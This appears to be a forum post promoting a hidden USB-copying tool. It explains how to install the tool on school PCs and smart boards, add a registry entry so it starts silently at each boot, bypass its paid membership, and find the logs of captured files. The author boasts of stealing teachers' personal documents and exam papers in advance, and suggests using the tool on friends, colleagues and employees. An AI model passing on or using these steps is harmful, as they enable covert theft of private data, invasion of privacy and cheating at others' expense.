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I wish everyone a good forum. Today, I am sharing the method by which I capture documents and texts on both school administration PCs and smart boards.

If you have friends who are still students, or your colleagues and employees in your company, you can find out what they carry on their USBs, whether they have important documents, or if you need to steal them, or if you are afraid of something happening to your USB, you can save it in your archive and use it in case you want to keep an automatic backup on the PC every time you plug it in.

During my high school days, almost all of my teachers' USBs were in my hands. I had written archives, family photos, e-school information, personal documents and information inside. In addition, I always had documents that even other teachers could not access. I would upgrade most of my software thanks to this application. I always had the orals, written documents, etc. in my possession a week in advance.

Anyway, I don't want to make it too long.
Install the setup I have given below (If you are not a lizard, you can install it)
Then enter the installed software and click start. From there, you can choose where the inserted USBs will be backed up. It starts again every time the PC is started, which is normally available to users who purchase a membership, but we found a solution for that too.

The start I gave in the archive. Open the reg file and add it to your registry. Thus, every time the PC restarts, it will boot in the background and be ready to pull USBs.

Seeing captured USB logs: (Default Location)
C:\Users\USERNAME\AppData\Roaming\Paludour
WIN+R => %appdata% => Enter => Paludour =>

Download link:
Rar Password: ip_utilman

VirusTotal:

If you have any questions, you can ask. The application runs in the background without any notice. It needs to be plugged in for a while to fully pull the USB. I would shoot the entire files between class hours. What a day...
 

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